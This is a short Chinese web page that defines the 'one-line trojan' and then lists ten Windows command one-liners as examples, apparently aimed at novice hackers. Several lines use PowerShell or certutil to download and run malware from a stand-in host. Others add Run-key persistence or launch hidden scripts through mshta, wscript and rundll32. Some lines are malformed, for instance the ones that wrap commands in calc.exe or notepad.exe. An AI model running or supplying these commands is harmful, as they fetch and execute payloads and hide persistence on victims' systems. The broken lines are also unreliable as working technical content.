一句话木马是指一种短小的、通常只有一行代码的恶意软件，它被用来在目标系统中执行攻击者的命令或代码。这种类型的木马通常通过各种途径被注入到目标系统中，一旦成功运行，攻击者就可以远程控制受感染的系统。一句话木马的目的包括窃取敏感信息、执行恶意操作、建立持久性访问等。这种木马的特点是简洁、隐蔽，使得攻击者能够轻松地操控目标系统。

一句话木马代码实例

1. powershell -w hidden -nop -e iex ((new-object net.webclient).downloadstring('http://example.com/malware.ps1'))
2. cmd /c echo set o=new ActiveXObject(\"Wscript.Shell\");o.Run(\"cmd /c echo hello > %TEMP%\\test.txt\", 0);>>%TEMP%\\test.vbs & %TEMP%\\test.vbs
3. reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"UpdateService\" /t REG_SZ /d \"powershell Start-Process cmd.exe -WindowStyle Hidden -Verb RunAs\"
4. mshta vbscript:CreateObject(\"WScript.Shell\").Run(\"cmd /c echo hello > %TEMP%\\test.txt\", 0);
5. rundll32.exe javascript:\_:RunDll %s C:\\Windows\\System32\\shell32.dll,Control_RunDLL C:\\Windows\\System32\\cmd.exe /c echo hello > %TEMP%\\test.txt
6. calc.exe /C powershell -NoP -NonI -W Hidden -Exec Bypass iex ((new-object net.webclient).DownloadString(\"http://example.com/malware.ps1\"))
7. wscript.exe //E:jscript \"FileSystemObject(\"C:\\\\Windows\\\\Temp\\\\test.txt\").Write(\"\"Hello World\"\")\"
8. certutil.exe -urlcache -split -f http://example.com/malware.exe %TEMP%\\malware.exe & %TEMP%\\malware.exe
9. reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"UpdateService\" /t REG_SZ /d \"C:\\\\Windows\\\\Temp\\\\test.exe\""
10. notepad.exe (powershell -NoP -STA -W Hidden -Exec Bypass iex ((new-object net.webclient).DownloadString(\"http://example.com/malware.ps1\")))

黑客入门学习图